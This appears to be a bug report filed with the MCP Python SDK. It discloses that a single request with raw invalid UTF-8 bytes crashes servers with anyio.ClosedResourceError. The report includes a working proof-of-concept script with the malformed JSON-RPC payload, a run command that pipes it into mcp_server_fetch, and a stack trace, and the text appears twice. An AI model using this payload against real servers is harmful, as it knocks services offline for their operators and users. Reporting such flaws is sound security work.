Initial Checks
Description
Summary
MCP Python SDK servers crash with anyio.ClosedResourceError when a client sends raw invalid UTF-8 bytes in request parameters. A malicious client can crash any MCP server using a single request.
Environment
- MCP SDK Version: 1.26.0 (latest)
- Python: 3.13
- OS: Windows 11
Proof of Concept
Save as crash_poc.py:
import sys
import time
# Initialize
sys.stdout.buffer.write(b'{"jsonrpc": "2.0", "id": 1, "method": "initialize", "params": {"protocolVersion": "2024-11-05", "capabilities": {}, "clientInfo": {"name": "test", "version": "1.0"}}}\n')
sys.stdout.flush()
time.sleep(1)
# Initialized notification
sys.stdout.buffer.write(b'{"jsonrpc": "2.0", "method": "notifications/initialized"}\n')
sys.stdout.flush()
time.sleep(0.5)
# Crash payload - raw bytes 0xFF 0xFE
sys.stdout.buffer.write(b'{"jsonrpc": "2.0", "id": 3, "method": "tools/call", "params": {"name": "fetch", "arguments": {"url": "http://x\xff\xfe"}}}\n')
sys.stdout.flush()
time.sleep(3)Run:
python crash_poc.py | python -m mcp_server_fetch
Stack Trace
File "...\mcp\server\lowlevel\server.py", line 781, in _handle_request
await message.respond(response)
File "...\mcp\shared\session.py", line 349, in _send_response
await self._write_stream.send(session_message)
File "...\anyio\streams\memory.py", line 218, in send_nowait
raise ClosedResourceError
anyio.ClosedResourceError
Key Observation
- String
"http://x[0xff][0xfe]" → handled gracefully with validation error ✅
- Raw bytes
b"http://x\xff\xfe" → server crash ❌
Expected Behavior
The server should return a JSON-RPC error response for malformed input, not crash.
Impact
Denial of Service - Any MCP client can crash any MCP server using the Python SDK with a single malformed request.
Discovery
Found using mcpsec evolutionary fuzzer.
Example Code
Python & MCP Python SDK
python --version
Python 3.13.1
pip show mcp | Select-String "Version."
Version: 1.26.0
Initial Checks
Description
Summary
MCP Python SDK servers crash with
anyio.ClosedResourceErrorwhen a client sends raw invalid UTF-8 bytes in request parameters. A malicious client can crash any MCP server using a single request.Environment
Proof of Concept
Save as
crash_poc.py:Run:
python crash_poc.py | python -m mcp_server_fetchStack Trace
Key Observation
"http://x[0xff][0xfe]"→ handled gracefully with validation error ✅b"http://x\xff\xfe"→ server crash ❌Expected Behavior
The server should return a JSON-RPC error response for malformed input, not crash.
Impact
Denial of Service - Any MCP client can crash any MCP server using the Python SDK with a single malformed request.
Discovery
Found using mcpsec evolutionary fuzzer.
Example Code
Python & MCP Python SDK